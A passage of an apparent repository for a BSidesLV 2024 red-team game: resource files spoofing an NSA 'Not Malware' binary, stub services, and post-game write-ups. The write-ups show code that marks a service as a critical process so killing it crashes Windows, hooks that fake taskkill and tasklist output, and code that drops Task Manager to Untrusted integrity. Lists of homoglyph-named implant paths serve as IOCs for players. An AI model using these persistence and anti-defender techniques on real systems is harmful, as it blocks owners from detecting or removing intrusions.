| } 415 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/malware.ico: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:759bd3fe1b90b4875cfd8d6639c5d89ba9a3c76417afe5184d865bff6d67fea7 3 | size 16958 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/malware.rc: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #include 18 | 19 | IDI_ICON_128 ICON "malware.ico" 20 | VS_VERSION_INFO VERSIONINFO 21 | FILEVERSION 4,5,6,69 22 | PRODUCTVERSION 4,5,6,69 23 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK 24 | FILEFLAGS 0 25 | FILEOS VOS__WINDOWS32 26 | FILETYPE VFT_DLL 27 | FILESUBTYPE VFT2_UNKNOWN 28 | 29 | BEGIN 30 | BLOCK "StringFileInfo" 31 | BEGIN 32 | BLOCK "040904B0" 33 | BEGIN 34 | VALUE "Comments", "Don't worry, I'm harmless!" 35 | VALUE "CompanyName", "US National Security Agency" 36 | VALUE "FileDescription", "Not Malware" 37 | VALUE "FileVersion", "0.0.0.0" 38 | VALUE "InternalName", "malware" 39 | VALUE "LegalCopyright", "Copyright(C) 2011 NSA" 40 | VALUE "OriginalFilename", "malware_build1.exe" 41 | VALUE "ProductName", "Not Malware" 42 | VALUE "ProductVersion", "0.0.0.0" 43 | END 44 | END 45 | BLOCK "VarFileInfo" 46 | BEGIN 47 | VALUE "Translation", 0x409, 1200 48 | END 49 | END 50 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/manifest.rc: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2023 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #include "winuser.h" 18 | 1 RT_MANIFEST manifest.xml 19 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/manifest.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/nop.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #define WINVER 0x0501 18 | #define _WIN32_WINNT 0x0501 19 | 20 | #define NOWH 21 | #define NOMB 22 | #define NOMSG 23 | #define NONLS 24 | #define NOMCX 25 | #define NOIME 26 | #define NOHELP 27 | #define NOCOMM 28 | #define NOICONS 29 | #define NOCRYPT 30 | #define NOKANJI 31 | #define NOSOUND 32 | #define NOCOLOR 33 | #define NOMENUS 34 | #define NOCTLMGR 35 | #define NOMINMAX 36 | #define NOSCROLL 37 | #define NODRAWTEXT 38 | #define NOMETAFILE 39 | #define NOPROFILER 40 | #define NOKEYSTATES 41 | #define NORASTEROPS 42 | #define NOCLIPBOARD 43 | #define NOWINSTYLES 44 | #define NOSYSMETRICS 45 | #define NOWINOFFSETS 46 | #define NOSHOWWINDOW 47 | #define NOTEXTMETRIC 48 | #define NOSYSCOMMANDS 49 | #define NOGDICAPMASKS 50 | #define NOWINMESSAGES 51 | #define NODEFERWINDOWPOS 52 | #define NOVIRTUALKEYCODES 53 | #define WIN32_LEAN_AND_MEAN 54 | 55 | #include 56 | 57 | int main(int argc, char *argv[]) { 58 | SleepEx(INFINITE, TRUE); 59 | } 60 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/nop_svc.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #define WINVER 0x0501 18 | #define _WIN32_WINNT 0x0501 19 | 20 | #define NOWH 21 | #define NOMB 22 | #define NOMSG 23 | #define NONLS 24 | #define NOMCX 25 | #define NOIME 26 | #define NOHELP 27 | #define NOCOMM 28 | #define NOICONS 29 | #define NOCRYPT 30 | #define NOKANJI 31 | #define NOSOUND 32 | #define NOCOLOR 33 | #define NOMENUS 34 | #define NOCTLMGR 35 | #define NOMINMAX 36 | #define NOSCROLL 37 | #define NODRAWTEXT 38 | #define NOMETAFILE 39 | #define NOPROFILER 40 | #define NOKEYSTATES 41 | #define NORASTEROPS 42 | #define NOCLIPBOARD 43 | #define NOWINSTYLES 44 | #define NOSYSMETRICS 45 | #define NOWINOFFSETS 46 | #define NOSHOWWINDOW 47 | #define NOTEXTMETRIC 48 | #define NOSYSCOMMANDS 49 | #define NOGDICAPMASKS 50 | #define NOWINMESSAGES 51 | #define NODEFERWINDOWPOS 52 | #define NOVIRTUALKEYCODES 53 | #define WIN32_LEAN_AND_MEAN 54 | 55 | #include 56 | 57 | HANDLE state; 58 | SERVICE_STATUS_HANDLE run; 59 | 60 | void WINAPI UpdateState(DWORD); 61 | void WINAPI NopService(DWORD, LPWSTR *); 62 | 63 | int main(int argc, char *argv[]) { 64 | SERVICE_TABLE_ENTRYW t[] = {{L"", &NopService}, {NULL, NULL}}; 65 | StartServiceCtrlDispatcherW(t); 66 | return 0; 67 | } 68 | 69 | DWORD WINAPI ServiceManager(DWORD c, DWORD v, void *d, void *x) { 70 | switch (c) { 71 | case SERVICE_CONTROL_STOP: 72 | case SERVICE_CONTROL_SHUTDOWN: 73 | UpdateState(0x3); 74 | SetEvent(state); 75 | break; 76 | default: 77 | UpdateState(0x4); 78 | break; 79 | } 80 | return 0; 81 | } 82 | 83 | void WINAPI UpdateState(DWORD s) { 84 | SERVICE_STATUS v = {0x10, s, 0x5, 0, 0, 0, 0}; 85 | SetServiceStatus(run, &v); 86 | } 87 | void WINAPI NopService(DWORD argc, LPWSTR *argv) { 88 | run = RegisterServiceCtrlHandlerExW(L"", &ServiceManager, NULL); 89 | UpdateState(0x2); 90 | state = CreateEventW(NULL, TRUE, FALSE, NULL); 91 | UpdateState(0x4); 92 | WaitForSingleObject(state, INFINITE); 93 | UpdateState(0x3); 94 | CloseHandle(state); 95 | UpdateState(0x1); 96 | } 97 | -------------------------------------------------------------------------------- /BSidesLV-2024/duck.md: -------------------------------------------------------------------------------- 1 | # The Duck Service 2 | 3 | The Duck service was a fun one this year. 4 | 5 | When started, it registered itself as a Critical Process, which would crash Windows 6 | if it died. 7 | 8 | The service was written to prevent being stopped and only respond to shutdown requests. 9 | 10 | Source in [`Support/duck.c`](Support/duck.c) 11 | 12 | ## Startup 13 | 14 | Get `SeDebugPrivilege` (required for the registration) 15 | 16 | ```C 17 | // Enable SeDebugPrivilege on the supplied Token. The DWORD arg can be used to 18 | // disable or enable the privilege. 19 | BOOL DuckDebug(HANDLE t, DWORD s) { 20 | if (fNtAdjustTokenPrivileges == NULL) { 21 | return FALSE; 22 | } 23 | TOKEN_PRIVILEGES p; 24 | p.PrivilegeCount = 1; 25 | p.Privileges[0].Attributes = s; 26 | p.Privileges[0].Luid.HighPart = 0; 27 | p.Privileges[0].Luid.LowPart = 0x14; // SE_DEBUG_PRIVILEGE 28 | DWORD u = 0; 29 | NTSTATUS r = fNtAdjustTokenPrivileges(t, FALSE, &p, 0x7C, NULL, &u); 30 | CloseHandle(t); 31 | if (r == 0) { 32 | return TRUE; 33 | } 34 | return FALSE; 35 | } 36 | ``` 37 | 38 | Set `ProcessBreakOnTermination` 39 | 40 | ```C 41 | // 0x2 - SE_PRIVILEGE_ENABLED 42 | if (DuckDebug(t, 0x2)) { 43 | // Only run if the privilege was got. 44 | // 0x1D - ProcessBreakOnTermination 45 | DWORD r = 0; 46 | // See if we have the flag already, if we can't get it, break. 47 | if (fNtQuery(GetCurrentProcess(), 0x1D, &last, 0x4, &r) > 0) { 48 | return; 49 | } 50 | DWORD v = 1; 51 | // 'v' value of 'ProcessBreakOnTermination' to be set. 1 == enabled. 52 | // 0x4 is the buffer size (its a DWORD, so 4 bytes). 53 | fNtSetInformationProcess(GetCurrentProcess(), 0x1D, &v, 0x4); 54 | // Release the privilege. 55 | // 0x0 - SE_PRIVILEGE_DISABLED 56 | DuckDebug(t, 0); 57 | } 58 | ``` 59 | 60 | Tell SCM that we'll only respond to shutdown requests. 61 | 62 | ```C 63 | VOID WINAPI DuckStatus(DWORD s) { 64 | // Only set that we reply to SERVICE_CONTROL_SHUTDOWN 65 | SERVICE_STATUS v = {0x10, s, 0x4, 0, 0, 0, 0}; 66 | SetServiceStatus(duck, &v); 67 | } 68 | ``` 69 | 70 | Boom! 71 | -------------------------------------------------------------------------------- /BSidesLV-2024/files.md: -------------------------------------------------------------------------------- 1 | # Database Lists 2 | 3 | These files will called by the implants to load more implants. 4 | Each file was encrypted, but you may have noticed this being loaded as an IOC. 5 | 6 | ```text 7 | C:\Windows\vpnplugins\f5\Common\StandаrdStylex.xbf 8 | C:\Windows\Microsoft.NET\assembly\GAC_64\napcrypt\v4.0_6.3.0.0__31bf3856ad364e35\nаpcrypt.dll 9 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Channels\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Cһannels.dll 10 | C:\Program Files (x86)\Windows NT\TableTextService\en-US\TableTextЅervice.mui 11 | C:\Windows\apppatch\apppatch64\AcԜinRT.sdb 12 | C:\Windows\System32\fi-FI\msimig.mui 13 | C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\v4.0_6.3.0.0__31bf3856ad364e35\mdmcommu.dll 14 | C:\Windows\SysWOW64\drivers\en-US\wfplwvs.mui 15 | C:\Windows\Boot\EFI\ru-RU\memtesp.mui 16 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deploymеnt.dll 17 | C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data.OracleClient\v4.0_4.0.0.0__b77a5c561934e089\System.Data.OracleClienc.dll 18 | C:\Windows\System32\shwebnvc.com 19 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_pt-BR_31bf3856ad364e35\Microsoft.IdentityServer.Web.Resourcеs.dll 20 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\v4.0_3.0.0.0_en_31bf3856ad364e35\UserProfileConfigurationWmiProvider.dll 21 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Controls.Ribbon\v4.0_4.0.0.0__b77a5c561934e089\NBMapTIP.dll 22 | C:\Windows\SysWOW64\InstallShield\setupdir\0010\isoburn.dll 23 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internalg.dll 24 | C:\Program Files\Windows Media Player\Media Renderer\RenderingControӏ.png 25 | C:\Windows\SystemResources\Windows.UI.MediaViewer\WindowsInternal_Inbox_Media_Viewer\Camera\ksetup.xbf 26 | C:\Windows\Web\Wallpaper\Theme1\ïmg4.jpg 27 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Tpm\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.dll 28 | C:\Windows\Microsoft.NET\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\normnfad.dll 29 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_pt_31bf3856ad364e35\Microsoft.IdentityServer.Web.Resourceb.dll 30 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WsatConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\TileSmall.contrast-white.exe 31 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.SDCommon\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDConmon.dll 32 | C:\Program Files (x86)\Windows Defender\EppManifemt.dll 33 | C:\Windows\SysWOW64\oobe\cmisеtup.dll 34 | C:\Windows\System32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{a9320207-0fcd-42e1-a71b-231481fb09a9}\vnapshօt.etl 35 | C:\Windows\SysWOW64\IME\SHARED\res\padrs416.dll 36 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Workflow.ServiceCore.Resources\v4.0_3.0.0.0_en_31bf3856ad364e35\Logo70.scale-180.dll 37 | C:\Windows\SysWOW64\IME\IMETC\Applets\imtcsкf.dll 38 | C:\Windows\SysWOW64\Licenses\neutral\Volume\Professional\winbrand.rtf 39 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_sl_31bf3856ad364e35\Microsoft.IdentityServer.Web.Rеsoubces.dll 40 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.NetworkInformation\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.NetworkInformatiok.dll 41 | C:\Windows\diagnostics\system\HomeGroup\en-US\DiagPackаge.mui 42 | C:\Windows\Boot\PCAT\pt-BR\bootmge.mui 43 | C:\Windows\SysWOW64\InstallShield\setupdir\001d\_setυp.dll 44 | C:\Windows\System32\ras\OptionalFeatures.scp 45 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_el_31bf3856ad364e35\RjvMDMConfig.dll 46 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Caching\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Cacһing.dll 47 | ``` 48 | -------------------------------------------------------------------------------- /BSidesLV-2024/hook.md: -------------------------------------------------------------------------------- 1 | # Userland Hooking 2 | 3 | Userland Hooking was done by injecting the compiled version of [`Support/hook.c`](Support/hook.c) 4 | into each user process. 5 | 6 | ## taskkill 7 | 8 | Taskkill was intercepted and made to return "SUCCESS" and exit with exit code 9 | zero. 10 | 11 | You'd notice this if you ran `tasklist /?`, it should return "SUCCESS", which is 12 | not valid behavior. 13 | 14 | ## tasklist 15 | 16 | Tasklist was intercepted and made to return a string constant. The returned results 17 | were not real processes. 18 | 19 | The string value in question: 20 | 21 | ```text 22 | Image Name PID Session Name Session# Mem Usage 23 | ========================= ======== ================ =========== ============ 24 | System Idle Process 0 Services 0 0 K 25 | System 4 Services 0 0 K 26 | smss.exe 0 Services 0 0 K 27 | csrss.exe 0 Console 0 0 K 28 | duck.exe -1 Services 1 0 K 29 | wininit.exe 0 Services 0 0 K 30 | never_gonna 10 Console 1 0 K 31 | give_you_up 11 Console 1 0 K 32 | never_gonna 12 Console 1 0 K 33 | let_you_down 13 Console 1 0 K 34 | never_gonna 14 Console 1 0 K 35 | run_around 15 Console 1 0 K 36 | and_hurt_you 16 Console 1 0 K 37 | never_gonna 17 Console 1 0 K 38 | say_goodbye 18 Console 1 0 K 39 | never_gonna 19 Console 1 0 K 40 | see_you_cry 20 Console 1 0 K 41 | ``` 42 | 43 | ## taskmgr 44 | 45 | Task Manager was intercepted and a thread was started on runtime that removed 46 | all permissions and set the Token Integrity level to "Untrusted" making it unable 47 | to display or refresh process information. 48 | 49 | ```C 50 | DWORD DoUntrust(void) { 51 | Sleep(500); 52 | HANDLE t; 53 | // Get Token for the current process. 54 | // 0x200A8 - TOKEN_READ | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_DEFAULT | TOKEN_QUERY 55 | if (!OpenProcessToken(GetCurrentProcess(), 0x200A8, &t)) { 56 | return 0; 57 | } 58 | SID a; 59 | DWORD c = 32; 60 | // Create an untrusted SID 61 | // 0x41 - WinUntrustedLabelSid 62 | if (!CreateWellKnownSid(0x41, NULL, &a, &c)) { 63 | CloseHandle(t); 64 | return 0; 65 | } 66 | SID_AND_ATTRIBUTES b; 67 | b.Sid = &a; 68 | b.Attributes = 0x20; // SE_GROUP_INTEGRITY 69 | // Set the untrusted SID as the Token Group SID 70 | // 0x19 - TokenIntegrityLevel 71 | SetTokenInformation(t, 0x19, &b, c + 4); 72 | CloseHandle(t); 73 | } 74 | ``` 75 | 76 | ## Process Hacker 77 | 78 | Similar to `taskmgr` this process had it permissions removed and it's Token 79 | Integrity level to "Untrusted" making it unable to display or refresh process 80 | information. 81 | 82 | The one different factor is an additional check against the `FileInfo\FileDescription` 83 | which would equal the same string, regardless of the name of the process. This allows 84 | for matching the process even if it's renamed. 85 | 86 | ## Other 87 | 88 | Other non-critical processes had the following API functions intercepted. 89 | 90 | - NtSuspendThread: Prevents suspending any Thread. 91 | - NtSuspendProcess: Prevents suspending any process. 92 | - NtTerminateProcess: Prevents terminating any Process. 93 | - This was bypassed if the PID equals the current PID as `ExitProcess` uses 94 | this under the hood. 95 | -------------------------------------------------------------------------------- /BSidesLV-2024/implants.md: -------------------------------------------------------------------------------- 1 | # List of Implants and Launchers 2 | 3 | These are the binaries that may have ran during the game. Not every one was present 4 | on all machines and placement is random. 5 | 6 | ## Implants 7 | 8 | These were implants potentially used during the game. These are ThunderStorm Bolts. 9 | 10 | ```text 11 | C:\Windows\vpnplugins\juniper\JunosPulseVрn.exe 12 | C:\Windows\System32\iphlpaрi.exe 13 | C:\Windows\SysWOW64\en\AuthFWSnapIn.Resourceh.dll 14 | C:\Windows\System32\SystemResetPlatform\SysResetLayoui.exe 15 | C:\Windows\SysWOW64\wbem\ipsdeu.exe 16 | C:\Windows\System32\rfxvmh.exe 17 | C:\Windows\SysWOW64\Com\mtsadmiո.dll 18 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceModel.Secukity.dll 19 | C:\Program Files (x86)\Windows Multimedia Platform\desk.dll 20 | C:\Windows\System32\migwiz\sfcm.dll 21 | C:\Windows\System32\kbdazе.exe 22 | C:\Windows\WinStore\AppxManifekt.exe 23 | C:\Windows\System32\fhuxсommon.exe 24 | C:\Windows\SysWOW64\IME\SHARED\res\padrs482.dll 25 | C:\Windows\ImmersiveControlPanel\vmbuspiper.exe 26 | C:\Windows\SysWOW64\Dism\SmiProvidgr.exe 27 | C:\Windows\BitLockerDiscoveryVolumeContents\cs-CZ_BitLockerToGо.exe 28 | C:\Windows\System32\rsaenһ.exe 29 | C:\Windows\System32\wbem\SystemResetOsUpdatesAgent.exe 30 | C:\Windows\System32\napdsոap.exe 31 | C:\Windows\System32\TimeSýncTask.exe 32 | C:\Windows\System32\Sysprep\uոbcl.exe 33 | C:\Windows\ADFS\en\taskschd.dll 34 | C:\Windows\ADFS\fr\mswb70011.dll 35 | C:\Program Files\Internet Explorer\MemoryAnalyzеr.exe 36 | C:\Windows\System32\WdmSvc.exe 37 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\DAConn.dll 38 | C:\Windows\System32\kbdеst.dll 39 | C:\Program Files (x86)\Windows NT\Accessories\wordpaԁ.exe 40 | C:\Windows\System32\mfreadwlite.exe 41 | C:\Windows\System32\amdxata.dll 42 | C:\Windows\System32\migration\ServiceModelRegMigPlugiո.dll 43 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Internal.Tasks.Dataflow\v4.0_4.0.0.0__b77a5c561934e089\Windows.Data.TimeZones.ro-RO.dll 44 | C:\Windows\Microsoft.NET\assembly\GAC_64\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuilԁ.exe 45 | C:\Windows\System32\oobe\WinLGDеp.exe 46 | C:\Windows\diagnostics\system\IEBrowseWeb\taskcomp.dll 47 | C:\Program Files\Windows Mail\msоeres.exe 48 | C:\Windows\ADFS\zh-HK\EhStorClass.dll 49 | C:\Windows\SysWOW64\AdvancedInstallers\cmiadapteb.dll 50 | C:\Program Files (x86)\Windows Photo Viewer\baseAltGr_rtl.exe 51 | C:\Windows\System32\Sysprep\msobjs.exe 52 | C:\Windows\System32\kbdukх.exe 53 | C:\Windows\FileManager\FileManagеr.exe 54 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq.Queryable\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.Querуable.dll 55 | C:\Windows\System32\RMAqtívate.dll 56 | C:\Program Files\Windows NT\Accessories\wordpаd.exe 57 | C:\Windows\System32\kbdgh.exe 58 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\runas.dll 59 | C:\Windows\System32\lpkinstalӏ.dll 60 | C:\Windows\BitLockerDiscoveryVolumeContents\nb-NO_BitLoсkerToGo.exe 61 | C:\Program Files (x86)\Windows Photo Viewer\PhotoViеweb.exe 62 | C:\Windows\System32\MdScһed.dll 63 | C:\Windows\System32\GreenBubbles.dll 64 | C:\Program Files (x86)\Internet Explorer\networbinspection.exe 65 | C:\Windows\System32\syctray.dll 66 | C:\Windows\System32\tsfill.dll 67 | C:\Windows\System32\scavengeսi.dll 68 | C:\Windows\Speech\Common\comrepl.exe 69 | C:\Windows\SysWOW64\migration\TableTextServiceMіg.dll 70 | C:\Windows\System32\SystemResetPlatform\dcomp.dll 71 | C:\Program Files\Common Files\microsoft shared\ink\winsetup.exe 72 | C:\Windows\System32\ieapfltk.dll 73 | C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactionl.dll 74 | C:\Windows\System32\AltTar.dll 75 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CertificateServices.PKIClient.Cmdlets.Resources\v4.0_6.3.0.0_en_31bf3856ad364e35\Microsoft.CertificateServices.PKIClient.Cmdlets.Resourcеs.dll 76 | C:\Program Files (x86)\Windows NT\Accessories\WordpadFilwer.exe 77 | C:\Windows\System32\wcncsνc.dll 78 | C:\Windows\System32\WsmAυto.exe 79 | C:\Program Files (x86)\Common Files\System\wab02.dll 80 | C:\Windows\System32\iphlpapі.dll 81 | C:\Windows\SysWOW64\wbem\WinMgmW.exe 82 | C:\Windows\System32\prncacl1.exe 83 | C:\Windows\System32\dsc\DscCoreP.dll 84 | C:\Windows\System32\dfsc.exe 85 | C:\Windows\System32\rpchtap.dll 86 | C:\Windows\System32\SnippinġToоl.dll 87 | C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceArmay.dll 88 | C:\Windows\Panther\sеtup.exe 89 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\napinit.resources\v4.0_6.3.0.0_en_31bf3856ad364e35\workerdd.dll 90 | C:\Windows\ADFS\th\Microsoft.IdentityServer.Web.Resourceq.dll 91 | C:\Windows\vpnplugins\juniper\AppxSignatufe.exe 92 | C:\Windows\System32\imgutiӏ.dll 93 | C:\Windows\System32\msvcr100_clr040О.exe 94 | C:\Windows\System32\dmdskrec.exe 95 | C:\Windows\SysWOW64\Com\MigRegDВ.exe 96 | C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.CertificateServices.PKIClient.Cmdlets\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.CertificateServices.PKICliene.Cmdlets.dll 97 | C:\Windows\vpnplugins\sonicwall\msvcr120_apр.exe 98 | C:\Windows\System32\nshһttр.dll 99 | C:\Windows\vpnplugins\juniper\msvcp120_aрp.exe 100 | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\en\Microsoft.WindowsSearch.Commands.Resourcеs.dll 101 | C:\Windows\System32\tapï32.dll 102 | C:\Windows\Camera\resoυrces.exe 103 | C:\Windows\System32\dqsh.exe 104 | C:\Windows\ADFS\no\jsdbgui.dll 105 | C:\Windows\SysWOW64\wbem\wmianap.exe 106 | C:\Program Files\Common Files\microsoft shared\ink\ipscay.exe 107 | C:\Windows\System32\wbengiոe.exe 108 | C:\Windows\Boot\Resources\mighost.dll 109 | C:\Windows\System32\frameԁyn.dll 110 | C:\Windows\System32\SystemResetPlatform\SysResetLаyout.exe 111 | C:\Windows\System32\kbdee.exe 112 | C:\Windows\ADFS\uk\VmdCoinstall.dll 113 | C:\Windows\System32\msdaenum.dll 114 | C:\Windows\System32\kbdвene.exe 115 | C:\Windows\System32\RTWorkԚ.exe 116 | ``` 117 | 118 | ## Launchers 119 | 120 | These were binaries that launched implants on the devices. These are ThunderStorm Flurries. 121 | 122 | ```text 123 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Formq.dll 124 | C:\Windows\diagnostics\system\UsbCore\VF_ResetOnResսme.dll 125 | C:\Windows\System32\wbem\schaոnel.dll 126 | C:\Windows\System32\mfsrcsnx.exe 127 | C:\Windows\System32\sxsseore.dll 128 | C:\Windows\System32\kbdаzel.dll 129 | C:\Windows\System32\msclmɗ.dll 130 | C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\ddputils.exe 131 | C:\Program Files\Windows Media Player\smprph.exe 132 | C:\Windows\vpnplugins\sonicwall\resourсes.exe 133 | C:\Windows\System32\Com\mtsadmiո.exe 134 | C:\Windows\Camera\AppxSiġnature.exe 135 | C:\Windows\setuperm.exe 136 | C:\Windows\System32\oobe\msoobeԁui.exe 137 | C:\Program Files (x86)\Internet Explorer\iedvtoοl.exe 138 | C:\Windows\System32\Dism\FolderPcovider.exe 139 | C:\Windows\System32\MsiCouire.exe 140 | C:\Windows\System32\proզuota.exe 141 | C:\Windows\System32\SettingSyncPolicу.exe 142 | C:\Windows\System32\mfdx.dll 143 | C:\Windows\System32\lpkinttall.dll 144 | C:\Windows\System32\wpnsluprov.dll 145 | C:\Windows\System32\dsounɗ.dll 146 | C:\Windows\System32\Boot\winaesume.exe 147 | C:\Program Files\Windows Defender\MsMpEոg.exe 148 | C:\Windows\SysWOW64\Dism\IBSPeovider.exe 149 | C:\Program Files (x86)\Internet Explorer\ЕxtExport.exe 150 | C:\Windows\System32\wbem\Dscpspluginwkh.exe 151 | C:\Windows\SysWOW64\Com\MigRеgDB.exe 152 | C:\Windows\System32\oobe\setupqqm.exe 153 | C:\Windows\Speech\Common\sapisvf.exe 154 | C:\Windows\ADFS\no\Microsoft.IdentityServer.Web.Resourcen.dll 155 | C:\Windows\System32\nshipqec.dll 156 | C:\Windows\System32\dfscӏi.dll 157 | C:\Windows\Microsoft.NET\assembly\GAC_64\System.Printing\v4.0_4.0.0.0__31bf3856ad364e35\tilewide.contrast-white.dll 158 | C:\Windows\vpnplugins\juniper\msvcr12O_app.exe 159 | C:\Windows\System32\IME\SHARED\mscanq20.exe 160 | C:\Windows\System32\Sysprep\syxprep.exe 161 | C:\Windows\System32\System.Xaml.exe 162 | C:\Windows\System32\fmifh.dll 163 | C:\Windows\System32\dhcpcsvc4.dll 164 | C:\Program Files\Windows Media Player\wmpnefwk.exe 165 | C:\Windows\SysWOW64\Macromed\Flash\Flаsh.exe 166 | C:\Program Files\Windows Journal\NBMapTІP.exe 167 | C:\Windows\System32\crypt34.exe 168 | C:\Windows\System32\wfcisvif.dll 169 | C:\Windows\System32\Sysprep\unbcӏ.exe 170 | C:\Windows\System32\Groupinghс.dll 171 | C:\Windows\BitLockerDiscoveryVolumeContents\autοrun.exe 172 | C:\Windows\SysWOW64\InstallShield\situp.exe 173 | C:\Program Files\Windows NT\Accessories\WordpadFilker.exe 174 | C:\Windows\System32\wһere.dll 175 | C:\Windows\System32\WMNetMge.exe 176 | C:\Windows\Camera\Vault.exe 177 | C:\Windows\System32\WmiPerfInst.dll 178 | C:\Windows\System32\uxpm.exe 179 | C:\Windows\System32\spcompaw.dll 180 | C:\Windows\System32\netnccim.exe 181 | C:\Windows\System32\mciqtz34.exe 182 | C:\Windows\System32\spool\tools\PrintBrmfs.exe 183 | C:\Windows\SysWOW64\Com\ProximityCommon.exe 184 | 